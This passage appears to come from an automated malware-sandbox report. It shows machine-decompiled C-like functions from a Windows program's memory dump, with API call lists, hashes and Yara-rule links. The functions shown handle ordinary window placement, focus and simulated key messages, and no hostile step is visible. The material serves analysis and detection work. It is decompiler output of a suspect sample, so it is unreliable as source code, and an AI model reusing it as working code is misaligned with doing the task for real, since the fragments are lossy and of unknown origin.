												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x45022c, _t258,  *[fs:eax], 0x450249, _t258,  *[fs:eax], 0x450270, _t258, _t184);
												_pop(_t245);
												 *[fs:eax] = _t245;
												_push(0x450233);
												__eflags = 0;
												E004207B0(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t267 =  *_t207 -  *0x496c10; // 0xc075
									if(_t267 == 0) {
										E00437760(_v8, 0, 0xb025, 0);
										E00437760(_v8, 0, 0xb024, 0);
										E00437760(_v8, 0, 0xb035, 0);
										E00437760(_v8, 0, 0xb009, 0);
										E00437760(_v8, 0, 0xb008, 0);
										E00437760(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t96 = E0043A6DC(_v8, _t207);
									L44:
									return _t96;
								}
							}
						}
					}
				}
			}







































                                                                        0x0044fecd
                                                                        0x0044fecf
                                                                        0x0044fed5
                                                                        0x0044fed7
                                                                        0x0044feda
                                                                        0x0044fedc
                                                                        0x0044fedf
                                                                        0x0044ff04
                                                                        0x0044ff04
                                                                        0x0044ff09
                                                                        0x0044ffb5
                                                                        0x0044ffbc
                                                                        0x0044ffc9
                                                                        0x0044ffc9
                                                                        0x0044ff0f
                                                                        0x0044ff0f
                                                                        0x0044ff10
                                                                        0x0044ff94
                                                                        0x0044ff9b
                                                                        0x0044ffa8
                                                                        0x0044ffa8
                                                                        0x0044ff12
                                                                        0x00000000
                                                                        0x0044ff12
                                                                        0x0044ff10
                                                                        0x00000000
                                                                        0x0044fee1
                                                                        0x0044fee1
                                                                        0x0044ffd3
                                                                        0x0044ffe1
                                                                        0x0044ffe8
                                                                        0x0044ffeb
                                                                        0x0044fff1
                                                                        0x0044fffb
                                                                        0x0044fffd
                                                                        0x0044ffff
                                                                        0x00450002
                                                                        0x00450009
                                                                        0x0045000b
                                                                        0x0045000e
                                                                        0x0045000e
                                                                        0x0045000e
                                                                        0x0045000e
                                                                        0x00450009
                                                                        0x0045001b
                                                                        0x0045001b
                                                                        0x0045001d
                                                                        0x00450027
                                                                        0x00450030
                                                                        0x00450030
                                                                        0x00450032
                                                                        0x0045003c
                                                                        0x0045003f
                                                                        0x00450034
                                                                        0x00450034
                                                                        0x00450036
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00450036
                                                                        0x0045001f
                                                                        0x0045001f
                                                                        0x00450021
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00450021
                                                                        0x0045001d
                                                                        0x00000000
                                                                        0x0044fee7
                                                                        0x0044feea
                                                                        0x0044feed
                                                                        0x0044ff17
                                                                        0x0044ff1e
                                                                        0x0044ff24
                                                                        0x0044ff27
                                                                        0x00000000
                                                                        0x0044ff2d
                                                                        0x0044ff2d
                                                                        0x0044ff30
                                                                        0x0044ff34
                                                                        0x00000000
                                                                        0x0044ff3a
                                                                        0x0044ff3a
                                                                        0x0044ff3c
                                                                        0x0044ff3f
                                                                        0x0044ff46
                                                                        0x0044ff68
                                                                        0x0044ff6e
                                                                        0x0044ff70
                                                                        0x0044ff72
                                                                        0x0044ff75
                                                                        0x0044ff7c
                                                                        0x0044ff7c
                                                                        0x0044ff75
                                                                        0x0044ff48
                                                                        0x0044ff4b
                                                                        0x0044ff50
                                                                        0x0044ff52
                                                                        0x0044ff61
                                                                        0x0044ff61
                                                                        0x0044ff52
                                                                        0x0044ff7e
                                                                        0x0044ff80
                                                                        0x00000000
                                                                        0x0044ff86
                                                                        0x0044ff87
                                                                        0x0044ff87
                                                                        0x0044ff80
                                                                        0x0044ff34
                                                                        0x0044ff27
                                                                        0x00000000
                                                                        0x0044feef
                                                                        0x0044feef
                                                                        0x0044fef2
                                                                        0x0045004b
                                                                        0x00450051
                                                                        0x00450054
                                                                        0x00000000
                                                                        0x0045005a
                                                                        0x0045005a
                                                                        0x0045005d
                                                                        0x00450064
                                                                        0x00000000
                                                                        0x0045006a
                                                                        0x00450080
                                                                        0x00450082
                                                                        0x00450084
                                                                        0x00000000
                                                                        0x0045008a
                                                                        0x00450096
                                                                        0x0045009b
                                                                        0x0045009c
                                                                        0x004500a1
                                                                        0x004500a4
                                                                        0x004500b3
                                                                        0x004500b8
                                                                        0x004500b9
                                                                        0x004500be
                                                                        0x004500c1
                                                                        0x004500cd
                                                                        0x004500e0
                                                                        0x004500f8
                                                                        0x004500ff
                                                                        0x00450102
                                                                        0x00450105
                                                                        0x0045010a
                                                                        0x0045010f
                                                                        0x00450124
                                                                        0x00450124
                                                                        0x00450084
                                                                        0x00450064
                                                                        0x0044fef8
                                                                        0x0044fef9
                                                                        0x00450149
                                                                        0x0045014c
                                                                        0x0045014f
                                                                        0x00000000
                                                                        0x00450155
                                                                        0x00450155
                                                                        0x00450158
                                                                        0x0045015f
                                                                        0x00000000
                                                                        0x00450165
                                                                        0x00450178
                                                                        0x0045017a
                                                                        0x0045017c
                                                                        0x00000000
                                                                        0x00450182
                                                                        0x00450185
                                                                        0x0045018b
                                                                        0x00450190
                                                                        0x0045019e
                                                                        0x004501ad
                                                                        0x004501bb
                                                                        0x004501c7
                                                                        0x004501d5
                                                                        0x004501de
                                                                        0x004501f1
                                                                        0x00450204
                                                                        0x00450209
                                                                        0x0045020c
                                                                        0x0045020f
                                                                        0x00450214
                                                                        0x00450219
                                                                        0x0045022b
                                                                        0x0045022b
                                                                        0x0045017c
                                                                        0x0045015f
                                                                        0x0044feff
                                                                        0x00450277
                                                                        0x00450279
                                                                        0x0045027f
                                                                        0x0045028d
                                                                        0x0045029e
                                                                        0x004502af
                                                                        0x004502c0
                                                                        0x004502d1
                                                                        0x004502e2
                                                                        0x004502e2
                                                                        0x004502e7
                                                                        0x004502ec
                                                                        0x004502f1
                                                                        0x004502f7
                                                                        0x004502f7
                                                                        0x0044fef9
                                                                        0x0044fef2
                                                                        0x0044feed
                                                                        0x0044fee1

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: RestoreSave$B080Focus
                                                                        • String ID:
                                                                        • API String ID: 809140284-0
                                                                        • Opcode ID: 789ad88bdf9d0dc65a6386dd81293534481b1fb8196139f914db52c916d73454
                                                                        • Instruction ID: 36f440bda38272c3496fecbe59fbd02416aab16c8b4ac7df962fff14ab053147
                                                                        • Opcode Fuzzy Hash: 789ad88bdf9d0dc65a6386dd81293534481b1fb8196139f914db52c916d73454
                                                                        • Instruction Fuzzy Hash: 7DB15138A00104DFDB14DFA9D589EAEB3F5EB09304F6540A6F805A7762C738EE45DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00456024, Relevance: 9.1, APIs: 6, Instructions: 86windownativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 37%
                                                                        			E00456024(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E0045501C( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E0043CC2C( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00406D8C();
						}
					}
					_t26 =  *0x495998; // 0x496a9c
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x495998; // 0x496a9c
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E00450DD4(_t36, 0);
						E004531AC( *((intOrPtr*)(_t51 + 0x44)));
					}
					E00455698(_t51);
					_t21 =  *0x496c08; // 0x215094c
					_t55 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E0043CC2C(_t55));
					}
					if( *((short*)(_t51 + 0x10a)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x108))();
					}
				}
				return _t21;
			}











                                                                        0x00456026
                                                                        0x0045602c
                                                                        0x00456033
                                                                        0x0045603d
                                                                        0x00456046
                                                                        0x00456080
                                                                        0x00456088
                                                                        0x00456057
                                                                        0x00456065
                                                                        0x00456067
                                                                        0x00000000
                                                                        0x00456069
                                                                        0x00456069
                                                                        0x0045606b
                                                                        0x00456070
                                                                        0x00456078
                                                                        0x00456079
                                                                        0x00456079
                                                                        0x00456067
                                                                        0x00456095
                                                                        0x0045609e
                                                                        0x004560a0
                                                                        0x004560a2
                                                                        0x004560a2
                                                                        0x004560a8
                                                                        0x004560b1
                                                                        0x004560b3
                                                                        0x004560b5
                                                                        0x004560b5
                                                                        0x004560bf
                                                                        0x004560c4
                                                                        0x004560c9
                                                                        0x004560dc
                                                                        0x004560e4
                                                                        0x004560e4
                                                                        0x004560eb
                                                                        0x004560f0
                                                                        0x004560f5
                                                                        0x004560fa
                                                                        0x00456104
                                                                        0x00456104
                                                                        0x00456111
                                                                        0x00000000
                                                                        0x0045611b
                                                                        0x00456111
                                                                        0x00456123

                                                                        APIs
                                                                        • IsIconic.USER32 ref: 0045602C
                                                                        • SetActiveWindow.USER32(?,?,?,?,00455A6E,00000000,00455F10), ref: 0045603D
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00456060
                                                                        • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00455A6E,00000000,00455F10), ref: 00456079
                                                                        • SetWindowPos.USER32(?,00000000,00000000,?,?,00455A6E,00000000,00455F10), ref: 004560BF
                                                                        • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00455A6E,00000000,00455F10), ref: 00456104
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                                        • String ID:
                                                                        • API String ID: 3996302123-0
                                                                        • Opcode ID: 47e2a0eaacd7a01a8f9391b870114d1f20509724b9173774fd90bf9746b98b00
                                                                        • Instruction ID: addb31afefe918bacc646d6c2825af304f505386283c36deccf03dfcd198963b
                                                                        • Opcode Fuzzy Hash: 47e2a0eaacd7a01a8f9391b870114d1f20509724b9173774fd90bf9746b98b00
                                                                        • Instruction Fuzzy Hash: A7312F707002409BEF11EF69CC85B6A3798AB04715F4914AABD44DF2D7CA7DEC888759
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043C658, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E0043C658(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E0043CF30(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E0043CF30(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E00435F4C(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E00435C00(_t52);
						return E004037D8(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}












                                                                        0x0043c661
                                                                        0x0043c663
                                                                        0x0043c665
                                                                        0x0043c66a
                                                                        0x0043c685
                                                                        0x0043c68e
                                                                        0x0043c6bc
                                                                        0x0043c6bc
                                                                        0x0043c6bf
                                                                        0x0043c6c5
                                                                        0x0043c6cb
                                                                        0x0043c6d0
                                                                        0x0043c6d5
                                                                        0x0043c6d7
                                                                        0x0043c6d9
                                                                        0x0043c6eb
                                                                        0x0043c6f5
                                                                        0x0043c700
                                                                        0x0043c701
                                                                        0x0043c702
                                                                        0x0043c703
                                                                        0x0043c70f
                                                                        0x0043c70f
                                                                        0x0043c714
                                                                        0x0043c716
                                                                        0x00000000
                                                                        0x0043c721
                                                                        0x0043c697
                                                                        0x0043c69c
                                                                        0x0043c69e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043c6b5
                                                                        0x00000000
                                                                        0x0043c679
                                                                        0x0043c679
                                                                        0x0043c67f
                                                                        0x0043c72c
                                                                        0x0043c72c
                                                                        0x00000000
                                                                        0x0043c67f

                                                                        APIs
                                                                        • IsIconic.USER32 ref: 0043C697
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043C6B5
                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 0043C6EB
                                                                        • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0043C70F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$Placement$Iconic
                                                                        • String ID: ,
                                                                        • API String ID: 568898626-3772416878
                                                                        • Opcode ID: d673cbac4b45b127f152e2a7f44669bc25f880b068426fc47df972cefe3dfc3b
                                                                        • Instruction ID: 5d51642662571711970a0e3d645df3d0aa1085e755de78576171e9613f821380
                                                                        • Opcode Fuzzy Hash: d673cbac4b45b127f152e2a7f44669bc25f880b068426fc47df972cefe3dfc3b
                                                                        • Instruction Fuzzy Hash: B7213071A00208ABCF54EF69C8C199A77A9AF0D354F05906BFE14EF346D779ED048BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00455F74, Relevance: 7.6, APIs: 5, Instructions: 59nativewindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E00455F74(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E00455688();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043CC2C( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E0045501C( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E0043CC2C( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L00406D8C();
					}
					if( *((short*)(_t40 + 0x102)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x100))();
					}
				}
				return _t21;
			}






                                                                        0x00455f76
                                                                        0x00455f78
                                                                        0x00455f7c
                                                                        0x00455f83
                                                                        0x00455f8b
                                                                        0x00455f90
                                                                        0x00455f94
                                                                        0x00455f9d
                                                                        0x00456001
                                                                        0x00456004
                                                                        0x00455fc0
                                                                        0x00455fc4
                                                                        0x00455fd6
                                                                        0x00455fdc
                                                                        0x00455fe0
                                                                        0x00455fe5
                                                                        0x00455fe7
                                                                        0x00455fec
                                                                        0x00455ff1
                                                                        0x00455ff1
                                                                        0x00455ff4
                                                                        0x00455ff5
                                                                        0x00455ff5
                                                                        0x00456011
                                                                        0x00000000
                                                                        0x0045601b
                                                                        0x00456011
                                                                        0x00456023

                                                                        APIs
                                                                        • IsIconic.USER32 ref: 00455F7C
                                                                        • SetActiveWindow.USER32(00000000,00000000,?,?,0045660C), ref: 00455F94
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00455FB7
                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045660C), ref: 00455FE0
                                                                        • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 00455FF5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                                        • String ID:
                                                                        • API String ID: 1720852555-0
                                                                        • Opcode ID: b48ccbd9e52d11f199ade556474468208e195aba5749c43cad4d731812e387f2
                                                                        • Instruction ID: b2ee28d00e52b312a41b956d375fa097b9583cfbf8aa8feeee27d57160c9c8e9
                                                                        • Opcode Fuzzy Hash: b48ccbd9e52d11f199ade556474468208e195aba5749c43cad4d731812e387f2
                                                                        • Instruction Fuzzy Hash: 9B1133716102009BDF14FE69C9C5B5B37A8AF08305F4414AAFE04DF287D679EC448714
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00427418, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E00427418(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x496ac5 != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E00427388( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x496aa0; // 0x427418
				 *0x496aa0 = E00427218(1, _t19, _t21, __edi, _t23);
				return  *0x496aa0(_t23, _t19);
			}










                                                                        0x00427420
                                                                        0x00427423
                                                                        0x0042742d
                                                                        0x00427457
                                                                        0x00427468
                                                                        0x0042747b
                                                                        0x0042746a
                                                                        0x0042746f
                                                                        0x0042746f
                                                                        0x00000000
                                                                        0x00427485
                                                                        0x00000000
                                                                        0x00427459
                                                                        0x00427434
                                                                        0x00427441
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AddressProc
                                                                        • String ID: MonitorFromWindow
                                                                        • API String ID: 190572456-2842599566
                                                                        • Opcode ID: 3bac1d995916bae630dc8399e42a92fe996f45957db1b53e04f404f2ee8b6375
                                                                        • Instruction ID: 35f16ded1955c2ed148f5dea8e37f92aac6793c71a0f0adcbddfe092b0b16418
                                                                        • Opcode Fuzzy Hash: 3bac1d995916bae630dc8399e42a92fe996f45957db1b53e04f404f2ee8b6375
                                                                        • Instruction Fuzzy Hash: AE01A2717081289AD700FB50AC81DEB775DEB11358B848137F815A3242D73CA90187AE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00459724, Relevance: 6.2, APIs: 4, Instructions: 163windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E00459724(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v268;
				char _v508;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _t75;
				intOrPtr _t91;
				char* _t97;
				signed int _t107;
				signed int _t114;
				intOrPtr _t121;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t146;
				int _t152;
				intOrPtr _t153;
				void* _t163;
				void* _t164;
				intOrPtr _t165;

				_t163 = _t164;
				_t165 = _t164 + 0xfffffde4;
				_v544 = 0;
				_v540 = 0;
				_v536 = 0;
				_v532 = 0;
				_v528 = 0;
				_t133 = __edx;
				_v8 = __eax;
				_push(_t163);
				_push(0x459984);
				_push( *[fs:eax]);
				 *[fs:eax] = _t165;
				if(__edx >= 1) {
					E004591EC(_v8,  &_v528);
					if(E0040A9F8(_v528, _t133) == 1) {
						_t133 = _t133 - 1;
					}
				}
				_v12 = _t133;
				if(E00459504(_v8) == 0) {
					__eflags = _v12;
					if(_v12 < 0) {
						__eflags = 0;
						_v12 = 0;
					}
					E004591EC(_v8,  &_v540);
					_t75 = E00404600(_v540);
					__eflags = _t75 - _v12;
					if(_t75 <= _v12) {
						E004591EC(_v8,  &_v544);
						_v12 = E00404600(_v544);
					}
					E00459700(_v8, _v12, _v12);
					goto L21;
				} else {
					if(_v12 < 0) {
						_v12 = 0;
					}
					_t135 = _v12 + 1;
					E004591EC(_v8,  &_v532);
					if(_t135 < E00404600(_v532)) {
						E004591EC(_v8,  &_v536);
						asm("bt [edx], eax");
						if(( *(_v536 + _t135 - 1) & 0x000000ff) < 0) {
							_t135 = _t135 + 1;
						}
					}
					_t24 = _v8 + 0x228; // 0xba6855c0
					_t91 =  *_t24;
					if(_t91 <= _v12) {
						_v12 = _t91;
						_t135 = _v12;
					}
					E00459700(_v8, _t135, _t135);
					if(_t135 == _v12) {
						 *((intOrPtr*)(_v8 + 0x230)) = _v12;
						L21:
						__eflags = 0;
						_pop(_t146);
						 *[fs:eax] = _t146;
						_push(0x45998b);
						return E0040436C( &_v544, 5);
					} else {
						GetKeyboardState( &_v268);
						_t152 = 0x100;
						_t97 =  &_v524;
						do {
							 *_t97 = 0;
							_t97 = _t97 + 1;
							_t152 = _t152 - 1;
							_t177 = _t152;
						} while (_t152 != 0);
						_v508 = 0x81;
						 *((char*)(_t163 + ( *(0x47ac20 + (E004037D8(_v8, _t177) & 0x0000007f) * 2) & 0x0000ffff) - 0x208)) = 0x81;
						SetKeyboardState( &_v524);
						 *((char*)(_v8 + 0x23c)) = 1;
						_push(_t163);
						_push(0x4598f2);
						_push( *[fs:eax]);
						 *[fs:eax] = _t165;
						_t107 = E004037D8(_v8, _t177);
						SendMessageA(E0043CC2C(_v8), 0x100,  *(0x47ac20 + (_t107 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_t114 = E004037D8(_v8, _t177);
						SendMessageA(E0043CC2C(_v8), 0x101,  *(0x47ac20 + (_t114 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_pop(_t153);
						 *[fs:eax] = _t153;
						_push(0x4598f9);
						_t121 = _v8;
						 *((char*)(_t121 + 0x23c)) = 0;
						return _t121;
					}
				}
			}



























                                                                        0x00459725
                                                                        0x00459727
                                                                        0x00459731
                                                                        0x00459737
                                                                        0x0045973d
                                                                        0x00459743
                                                                        0x00459749
                                                                        0x0045974f
                                                                        0x00459751
                                                                        0x00459756
                                                                        0x00459757
                                                                        0x0045975c
                                                                        0x0045975f
                                                                        0x00459765
                                                                        0x00459770
                                                                        0x00459784
                                                                        0x00459786
                                                                        0x00459786
                                                                        0x00459784
                                                                        0x00459787
                                                                        0x00459794
                                                                        0x00459913
                                                                        0x00459917
                                                                        0x00459919
                                                                        0x0045991b
                                                                        0x0045991b
                                                                        0x00459927
                                                                        0x00459932
                                                                        0x00459937
                                                                        0x0045993a
                                                                        0x00459945
                                                                        0x00459955
                                                                        0x00459955
                                                                        0x00459961
                                                                        0x00000000
                                                                        0x0045979a
                                                                        0x0045979e
                                                                        0x004597a2
                                                                        0x004597a2
                                                                        0x004597a8
                                                                        0x004597b2
                                                                        0x004597c4
                                                                        0x004597cf
                                                                        0x004597e9
                                                                        0x004597ec
                                                                        0x004597ee
                                                                        0x004597ee
                                                                        0x004597ec
                                                                        0x004597f2
                                                                        0x004597f2
                                                                        0x004597fb
                                                                        0x004597fd
                                                                        0x00459800
                                                                        0x00459800
                                                                        0x0045980a
                                                                        0x00459812
                                                                        0x0045990b
                                                                        0x00459966
                                                                        0x00459966
                                                                        0x00459968
                                                                        0x0045996b
                                                                        0x0045996e
                                                                        0x00459983
                                                                        0x00459818
                                                                        0x0045981f
                                                                        0x00459824
                                                                        0x00459829
                                                                        0x0045982f
                                                                        0x0045982f
                                                                        0x00459832
                                                                        0x00459833
                                                                        0x00459833
                                                                        0x00459833
                                                                        0x00459836
                                                                        0x00459854
                                                                        0x00459863
                                                                        0x0045986b
                                                                        0x00459874
                                                                        0x00459875
                                                                        0x0045987a
                                                                        0x0045987d
                                                                        0x00459889
                                                                        0x004598a8
                                                                        0x004598b6
                                                                        0x004598d5
                                                                        0x004598dc
                                                                        0x004598df
                                                                        0x004598e2
                                                                        0x004598e7
                                                                        0x004598ea
                                                                        0x004598f1
                                                                        0x004598f1
                                                                        0x00459812

                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,00000000,00459984), ref: 0045981F
                                                                        • SetKeyboardState.USER32(00000081), ref: 00459863
                                                                        • SendMessageA.USER32 ref: 004598A8
                                                                        • SendMessageA.USER32 ref: 004598D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
